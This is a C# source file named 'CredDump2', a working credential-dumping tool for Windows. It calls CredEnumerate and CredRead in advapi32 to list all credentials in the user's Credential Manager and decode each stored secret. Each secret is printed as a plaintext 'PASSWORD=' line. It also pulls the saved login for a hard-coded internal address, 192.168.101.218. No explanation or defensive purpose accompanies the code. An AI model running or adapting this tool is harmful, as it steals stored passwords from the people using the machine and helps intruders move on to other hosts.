using System; using System.Runtime.InteropServices; using System.Text; class CredDump2 { [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] struct CREDENTIAL { public int Flags; public int Type; public string TargetName; public string Comment; public long LastWritten; public int CredentialBlobSize; public IntPtr CredentialBlob; public int Persist; public int AttributeCount; public IntPtr Attributes; public string TargetAlias; public string UserName; } [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] static extern bool CredRead(string target, int type, int flags, out IntPtr cred); [DllImport("advapi32.dll")] static extern void CredFree(IntPtr buffer); [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] static extern bool CredEnumerate(string filter, int flags, out int count, out IntPtr creds); static void Main() { Console.WriteLine("IntPtr.Size=" + IntPtr.Size); // Enumerate int count = 0; IntPtr pCreds = IntPtr.Zero; bool ok = CredEnumerate(null, 0, out count, out pCreds); Console.WriteLine("Enumerate: " + ok + " count=" + count); if (ok && count > 0) { for (int i = 0; i < count; i++) { IntPtr ptr = Marshal.ReadIntPtr(pCreds, i * IntPtr.Size); CREDENTIAL cred = (CREDENTIAL)Marshal.PtrToStructure(ptr, typeof(CREDENTIAL)); Console.WriteLine("Target=" + cred.TargetName + " Type=" + cred.Type + " User=" + cred.UserName + " BlobSize=" + cred.CredentialBlobSize); if (cred.CredentialBlobSize > 0 && cred.CredentialBlob != IntPtr.Zero) { byte[] bytes = new byte[cred.CredentialBlobSize]; Marshal.Copy(cred.CredentialBlob, bytes, 0, cred.CredentialBlobSize); string pwd = Encoding.Unicode.GetString(bytes); Console.WriteLine(" PASSWORD=" + pwd); } } CredFree(pCreds); } // Direct read string[] targets = {"192.168.101.218"}; foreach (string t in targets) { IntPtr pCred = IntPtr.Zero; ok = CredRead(t, 2, 0, out pCred); Console.WriteLine("CredRead(" + t + "): " + ok); if (ok) { CREDENTIAL cred = (CREDENTIAL)Marshal.PtrToStructure(pCred, typeof(CREDENTIAL)); Console.WriteLine(" Target=" + cred.TargetName + " User=" + cred.UserName + " BlobSize=" + cred.CredentialBlobSize); if (cred.CredentialBlobSize > 0 && cred.CredentialBlob != IntPtr.Zero) { byte[] bytes = new byte[cred.CredentialBlobSize]; Marshal.Copy(cred.CredentialBlob, bytes, 0, cred.CredentialBlobSize); string pwd = Encoding.Unicode.GetString(bytes); Console.WriteLine(" PASSWORD=" + pwd); } CredFree(pCred); } } } }